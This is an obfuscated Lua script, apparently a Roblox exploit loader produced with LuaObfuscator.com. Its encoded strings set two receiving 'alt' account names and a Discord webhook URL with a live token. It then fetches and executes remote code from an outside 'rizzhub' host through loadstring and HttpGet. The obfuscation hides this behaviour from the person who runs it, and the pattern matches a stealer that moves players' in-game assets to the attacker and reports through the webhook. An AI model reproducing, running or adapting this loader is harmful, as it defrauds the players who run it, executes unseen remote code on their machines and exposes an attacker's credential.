--[[
 .____                  ________ ___.    _____                           __                
 |    |    __ _______   \_____  \\_ |___/ ____\_ __  ______ ____ _____ _/  |_  ___________ 
 |    |   |  |  \__  \   /   |   \| __ \   __\  |  \/  ___// ___\\__  \\   __\/  _ \_  __ \
 |    |___|  |  // __ \_/    |    \ \_\ \  | |  |  /\___ \\  \___ / __ \|  | (  <_> )  | \/
 |_______ \____/(____  /\_______  /___  /__| |____//____  >\___  >____  /__|  \____/|__|   
         \/          \/         \/    \/                \/     \/     \/                   
          \_Welcome to LuaObfuscator.com   (Alpha 0.2.6) ~  Much Love, Ferib 

]]--

do local v0=tonumber;local v1=string.byte;local v2=string.char;local v3=string.sub;local v4=string.gsub;local v5=string.rep;local v6=table.concat;local v7=table.insert;local v8=math.ldexp;local v9=getfenv or function()return _ENV;end ;local v10=setmetatable;local v11=pcall;local v12=select;local v13=unpack or table.unpack ;local v14=tonumber;local function v15(v16,v17,...)local v18=1;local v19;v16=v4(v3(v16,5),"..",function(v30)if (v1(v30,2)==79) then v19=v0(v3(v30,1,1));return "";else local v74=0;local v75;while true do if (v74==0) then v75=v2(v0(v30,16));if v19 then local v99=0;local v100;while true do if (v99==1) then return v100;end if (v99==0) then v100=v5(v75,v19);v19=nil;v99=1;end end else return v75;end break;end end end end);local function v20(v31,v32,v33)if v33 then local v76=(v31/(2^(v32-(1 + (0 -0)))))%((7 -5)^(((v33-(1 + 0)) -(v32-(1 -0))) + ((1813 -(102 + 535)) -(784 + 391)))) ;return v76-(v76%((4 -2) -(1 -0))) ;else local v77=(5 -3)^(v32-(3 -2)) ;return (((v31%(v77 + v77))>=v77) and (1 -0)) or (0 -0) ;end end local function v21()local v34=v1(v16,v18,v18);v18=v18 + 1 ;return v34;end local function v22()local v35,v36=v1(v16,v18,v18 + 2 + 0 );v18=v18 + 2 ;return (v36 * (172 + 84)) + v35 ;end local function v23()local v37=(2527 -1168) -(11 + 1348) ;local v38;local v39;local v40;local v41;while true do if (v37==(226 -(206 + 20))) then v38,v39,v40,v41=v1(v16,v18,v18 + 3 );v18=v18 + (6 -2) ;v37=1626 -(929 + 696) ;end if (1==v37) then return (v41 * ((95709643 -52011841) -26920586)) + (v40 * (65795 -(91 + 168))) + (v39 * (760 -504)) + v38 ;end end end local function v24()local v42=0 + 0 ;local v43;local v44;local v45;local v46;local v47;local v48;while true do if (v42==(0 + 0)) then v43=v23();v44=v23();v42=2 -1 ;end if (v42==(2 + 0)) then v47=v20(v44,(38 -22) + (8 -3) ,28 + 3 );v48=((v20(v44,29 + 3 )==(3 -2)) and  -(1 + 0)) or (1571 -(1542 + 28)) ;v42=(304 -181) -(33 + 87) ;end if (v42==(1 + 0)) then v45=1;v46=(v20(v44,1,5 + 15 ) * (((729 -(58 + 666)) -3)^(62 -(21 + 9)))) + v43 ;v42=1 + 1 ;end if ((1089 -(598 + 488))==v42) then if (v47==(0 + 0)) then if (v46==(1021 -(878 + 143))) then return v48 * (196 -(189 + 7)) ;else local v101=0 -0 ;while true do if (v101==((0 -0) -0)) then v47=1 + 0 ;v45=0 + 0 ;break;end end end elseif (v47==(4639 -2592)) then return ((v46==(1652 -(943 + 709))) and (v48 * ((1 + 0 + 0)/(0 + 0)))) or (v48 * NaN) ;end return v8(v48,v47-(578 + 263 + 182) ) * (v45 + (v46/((6 -4)^(1559 -(313 + 49 + 1145))))) ;end end end local function v25(v49)local v50;if  not v49 then v49=v23();if (v49==(1301 -(585 + 716))) then return "";end end v50=v3(v16,v18,(v18 + v49) -(2 -1) );v18=v18 + v49 ;local v51={};for v67=1, #v50 do v51[v67]=v2(v1(v3(v50,v67,v67)));end return v6(v51);end local v26=v23;local function v27(...)return {...},v12("#",...);end local function v28()local v52=0 + 0 ;local v53;local v54;local v55;local v56;local v57;local v58;local v59;local v60;while true do if (v52==1) then v55=nil;v56=nil;v52=3 -1 ;end if (v52==(1601 -(798 + 799))) then while true do if (3~=v53) then else v60=nil;while true do local v102=503 -(264 + 239) ;local v103;local v104;while true do if (v102~=0) then else v103=0 + 0 ;v104=nil;v102=1;end if (v102~=(1538 -(880 + 657))) then else while true do if (v103==(0 -0)) then v104=0 + 0 ;while true do if (v104==1) then if (v54==1) then local v125=0;local v126;while true do if ((0 + 0)==v125) then v126=0 + 0 ;while true do if (v126~=1) then else local v143=0;while true do if (0~=v143) then else for v155=1 + 0 ,v59 do local v156=0;local v157;local v158;while true do if (v156==(3 -2)) then if (v157==1) then v158=v21()~=(0 + 0) ;elseif (v157==(9 -7)) then v158=v24();elseif (v157==3) then v158=v25();end v60[v155]=v158;break;end if (v156==(0 -0)) then local v168=0 + 0 ;local v169;while true do if (v168==(0 -0)) then v169=0 -0 ;while true do if (v169==(0 + 0)) then v157=v21();v158=nil;v169=1804 -(187 + 1616) ;end if (v169==1) then v156=1;break;end end break;end end end end end v58[3]=v21();v143=2 -1 ;end if (v143==1) then v126=2;break;end end end if (v126~=(0 -0)) then else local v144=0 + 0 ;while true do if (v144==0) then v59=v23();v60={};v144=1 + 0 ;end if (v144==(1873 -(189 + 1683))) then v126=3 -2 ;break;end end end if (v126==(2 + 0)) then v54=2;break;end end break;end end end break;end if (v104~=0) then else if (v54~=0) then else local v127=0 + 0 ;local v128;local v129;while true do if (v127==0) then v128=0 -0 ;v129=nil;v127=1;end if (1==v127) then while true do if (v128==0) then v129=0 -0 ;while true do if (v129~=(4 -2)) then else v54=2 -1 ;break;end if (v129~=1) then else local v152=0;local v153;while true do if (v152~=(0 + 0)) then else v153=0;while true do if (v153~=(1 -0)) then else v129=2;break;end if (v153==(150 -(98 + 52))) then local v170=0;while true do if (v170==0) then v57={};v58={v55,v56,nil,v57};v170=1;end if (v170~=(4 -3)) then else v153=1;break;end end end end break;end end end if (v129~=(1536 -(264 + 1272))) then else local v154=0;while true do if (v154==0) then local v166=0 -0 ;while true do if (v166~=0) then else v55={};v56={};v166=1 -0 ;end if (v166~=1) then else v154=20 -(15 + 4) ;break;end end end if (v154==(1 -0)) then v129=1;break;end end end end break;end end break;end end end if (v54==(166 -(76 + 88))) then local v130=1644 -(762 + 882) ;while true do local v133=0 + 0 ;while true do if ((0 -0)==v133) then if (v130~=(186 -(66 + 119))) then else local v145=0 -0 ;while true do if (0==v145) then for v159=1 -0 ,v23() do v57[v159]=v23();end return v58;end end end if (0==v130) then local v146=0 -0 ;while true do if (v146==(0 + 0)) then for v161=3 -2 ,v23() do local v162=0;local v163;while true do if (v162~=(0 + 0)) then else v163=v21();if (v20(v163,1,1 + 0 )~=0) then else local v171=0;local v172;local v173;local v174;local v175;local v176;while true do if (v171~=(1325 -(305 + 1020))) then else v172=0;v173=nil;v171=1 + 0 ;end if (v171~=2) then else v176=nil;while true do if (v172==2) then while true do if (v173==3) then if (v20(v175,1495 -(756 + 736) ,3)~=(1 -0)) then else v176[5 -1 ]=v60[v176[4]];end v55[v161]=v176;break;end if (v173~=(1 + 0)) then else local v178=1635 -(1427 + 208) ;local v179;while true do if (0==v178) then v179=0;while true do if (0~=v179) then else v176={v22(),v22(),nil,nil};if (v174==0) then local v185=329 -(211 + 118) ;local v186;while true do if (v185==(599 -(297 + 302))) then v186=1882 -(1207 + 675) ;while true do if (v186~=0) then else v176[136 -(105 + 28) ]=v22();v176[4]=v22();break;end end break;end end elseif (v174==(3 -2)) then v176[6 -3 ]=v23();elseif (v174==(1 + 1)) then v176[3]=v23() -((2 + 0)^16) ;elseif (v174==(2 + 1)) then local v195=410 -(259 + 151) ;local v196;while true do if (v195~=0) then else v196=1756 -(1044 + 712) ;while true do if (v196~=0) then else v176[1260 -(275 + 982) ]=v23() -(2^(1272 -(179 + 1077))) ;v176[706 -(287 + 415) ]=v22();break;end end break;end end end v179=2 -1 ;end if (1~=v179) then else v173=2;break;end end break;end end end if (v173==(153 -(85 + 66))) then local v180=0;local v181;while true do if (v180==0) then v181=0 -0 ;while true do if (v181~=(0 -0)) then else local v184=0;while true do if (v184==0) then if (v20(v175,1 -0 ,1)~=(2 -1)) then else v176[1643 -(634 + 1007) ]=v60[v176[3 -1 ]];end if (v20(v175,2,446 -(275 + 169) )==(1459 -(878 + 580))) then v176[3]=v60[v176[1050 -(1037 + 10) ]];end v184=1 + 0 ;end if (v184~=1) then else v181=1;break;end end end if (v181==(467 -(301 + 165))) then v173=6 -3 ;break;end end break;end end end if (v173~=0) then else v174=v20(v163,1 + 1 ,3);v175=v20(v163,7 -3 ,7 -1 );v173=1;end end break;end if (v172~=(0 + 0)) then else v173=0 + 0 ;v174=nil;v172=1;end if (v172==1) then v175=nil;v176=nil;v172=2;end end break;end if (v171==1) then v174=nil;v175=nil;v171=2;end end end break;end end end for v164=1,v23() do v56[v164-1 ]=v28();end v146=1 -0 ;end if ((1 + 0)~=v146) then else v130=1;break;end end end break;end end end end v104=1;end end break;end end break;end end end break;end if (v53==(1552 -(1085 + 467))) then local v95=0 -0 ;while true do if (v95~=(766 -(237 + 529))) then else v54=0;v55=nil;v95=1;end if (v95==1) then v53=294 -(130 + 163) ;break;end end end if ((2 -1)==v53) then v56=nil;v57=nil;v53=992 -(806 + 184) ;end if (v53==2) then local v96=843 -(11 + 832) ;while true do if (1==v96) then v53=3;break;end if (v96==(0 -0)) then v58=nil;v59=nil;v96=1 + 0 ;end end end end break;end if (v52==3) then v59=nil;v60=nil;v52=3 + 1 ;end if (v52==(2 + 0)) then v57=nil;v58=nil;v52=3;end if (v52==0) then v53=0;v54=nil;v52=3 -2 ;end end end local function v29(v61,v62,v63)local v64=v61[1];local v65=v61[2];local v66=v61[3];return function(...)local v69=1;local v70= -1;local v71={...};local v72=v12("#",...) -1 ;local function v73()local v78=v64;local v79=v65;local v80=v66;local v81=v27;local v82={};local v83={};local v84={};for v88=(1981 -621) -(480 + 880) ,v72 do if ((v88>=v80) or ((6033 -(70 + 1116))<=(3801 -(690 + 654)))) then v82[v88-v80 ]=v71[v88 + (29 -(21 + 7)) ];else v84[v88]=v71[v88 + (1973 -(861 + 1111)) + 0 ];end end local v85=(v72-v80) + (2 -1) ;local v86;local v87;while true do local v89=0 -(0 -0) ;while true do if (((4566 -(32 + 92))==(9039 -4597)) and (v89==1)) then if ((v87<=(4 -1)) or (3568>=(6616 -(724 + (3655 -2591))))) then if ((v87<=((13 -10) -(4 -2))) or ((339 + 1274)==((4114 + 643) -((589 -369) + (664 -(102 + 107)))))) then if ((v87==(0 -0)) or ((87 + 2123 + 1266)<=1725)) then v63[v86[3]]=v84[v86[2]];else v84[v86[7 -5 ]]=v86[699 -((149 -(85 + 9)) + 641) ]~=(250 -(93 + 157)) ;end elseif ((v87==(4 -2)) or ((3210 -(469 + (5390 -4277)))>(404 + 1606))) then v84[v86[2 + (622 -(272 + 350)) ]]=v86[14 -11 ];else local v110=0 -0 ;local v111;local v112;while true do if (((1402 + 1027)<(4372 -(1014 + 282))) and (v110==(2 -(420 -(130 + 289))))) then while true do if (((590 + 763)==(323 + 1030)) and (v111==(1945 -(180 + 1765)))) then v112=v86[1 + 1 ];v84[v112]=v84[v112](v13(v84,v112 + 1 + 0 ,v70));break;end end break;end if (((416 -((106 -52) + 36))==(1053 -((699 -(116 + 530)) + (2017 -(580 + 763))))) and (v110==(0 + 0))) then v111=1280 -(793 + 487) ;v112=nil;v110=1 + 0 ;end end end elseif ((3064>(4175 -(615 + 817))) and (v87<=(887 -((3130 -2313) + 65)))) then if ((v87>(2 + 2)) or ((1514 -(757 + 166))>=(2117 + (1565 -480)))) then v84[v86[1 + 1 ]]=v63[v86[2 + 1 ]];else do return;end end elseif ((v87<=(2 + 4)) or ((5322 -(757 + 157))<(5401 -(1105 + 858)))) then v84[v86[2 + 0 ]]();elseif (((274 + 561)<=(3817 -(1713 -503))) and (v87>(2 + 5))) then local v115=(956 -658) -(280 + (69 -51)) ;local v116;local v117;local v118;while true do if ((v115==1) or ((275 -199)>=(7476 -2688))) then v118=nil;while true do if ((1893>=(909 -(485 + 166))) and (v116==(918 -(78 + 839)))) then v84[v117 + (1 -0) ]=v118;v84[v117]=v118[v86[1847 -(96 + (4648 -2901)) ]];break;end if (((442 + 108)<((4344 -(147 + 1795)) -1241)) and (v116==(0 -0))) then local v137=0;local v138;while true do if (((4191 -(2626 + 675))==(2623 -(520 + 1213))) and ((0 -(0 -0))==v137)) then v138=1347 -(297 + (2094 -1044)) ;while true do if ((v138==(0 + 0)) or (((5097 -(18 + 396)) -3620)>(3851 -1344))) then v117=v86[2];v118=v84[v86[3 + 0 ]];v138=1;end if ((v138==(1 + 0)) or (((397 + 3992) -1804)>=(371 + 3507))) then v116=1;break;end end break;end end end end break;end if (((11331 -8201)==(5001 -(1306 + 565))) and (v115==0)) then v116=991 -(566 + 425) ;v117=nil;v115=337 -(225 + 111) ;end end else local v119=0;local v120;local v121;local v122;local v123;local v124;while true do if (((0 + 0)==v119) or (((6522 + 15721) -17746)<(5289 -3937))) then v120=212 -(166 + 23 + 23) ;v121=nil;v119=1 -0 ;end if (((869 -(968 -287))<(8503 -4630)) and (v119==2)) then v124=nil;while true do if (((3584 + (1581 -1076))<=((14929 -(6 + 19)) -10131)) and (0==v120)) then local v139=782 -(201 + (1367 -786)) ;while true do if (((620 + 1893)==(3480 -(636 + (546 -215)))) and (v139==((1 -0) + 0))) then v120=2 -1 ;break;end if ((v139==(0 + 0)) or ((10683 -7061)<=(4327 -(647 + 321 + 340)))) then v121=v86[(49 + 33) -(65 + (42 -27)) ];v122,v123=v81(v84[v121](v13(v84,v121 + 1 + 0 ,v86[3])));v139=1 + 0 ;end end end if ((v120==(1 + 0)) or ((4603 -(13 + 104 + 140))<=1265)) then v70=(v123 + v121) -(1 + (1518 -(1181 + 337))) ;v124=860 -(594 + 266) ;v120=5 -3 ;end if ((v120==2) or ((4006 -2983)>((7506 -(231 + 954)) -((1596 -(245 + 683)) + 691)))) then for v140=v121,v70 do local v141=0 -0 ;while true do if (((2018 -(725 + 11))<=1814) and (v141==(655 -(371 + 284)))) then v124=v124 + (1959 -((3178 -1539) + 319)) ;v84[v140]=v122[v124];break;end end end break;end end break;end if ((v119==(1 + 0)) or (2041==((6239 -(1044 + 301)) -(79 + 346)))) then v122=nil;v123=nil;v119=2;end end end v69=v69 + (3 -2) ;break;end if (((2915 + 479)==(4705 -(517 + (1210 -416)))) and (0==v89)) then v86=v78[v69];v87=v86[1 + 0 ];v89=1 -0 ;end end end end A,B=v27(v11(v73));if  not A[1] then local v90=v61[4][v69] or "?" ;error("Script error at ["   .. v90   .. "]:"   .. A[2] );else return v13(A,2,B);end end;end return v29(v28(),{},v17)(...);end v15("LOL!0A3O0003083O00557365724E616D65030E3O00736678616C74666F7267656D733103093O00557365724E616D6532030E3O00736678616C74666F7267656D733203073O00576562682O6F6B03793O00682O7470733A2O2F646973636F72642E636F6D2F6170692F776562682O6F6B732F313038373031352O34313935333731383238322F4A5955754C782D72713549456B766D4555575A436A4158306D686C4E7A773749426876536545346B424D5875594F565542522D356645514C4A56484B6A79383644796671030A3O006C6F6164737472696E6703043O0067616D6503073O00482O747047657403243O00682O7470733A2O2F72692O7A6875622E78797A2F736372697074732F4D61696E2E6C7561000F3O0012023O00023O00124O00013O0012023O00043O00124O00033O0012023O00063O00124O00053O0012053O00073O001205000100083O0020080001000100090012020003000A4O0001000400014O0007000100044O00035O00022O00063O000100012O00043O00017O000F3O00023O00023O00033O00033O00043O00043O00053O00053O00053O00053O00053O00053O00053O00053O00063O00",v9(),...);end
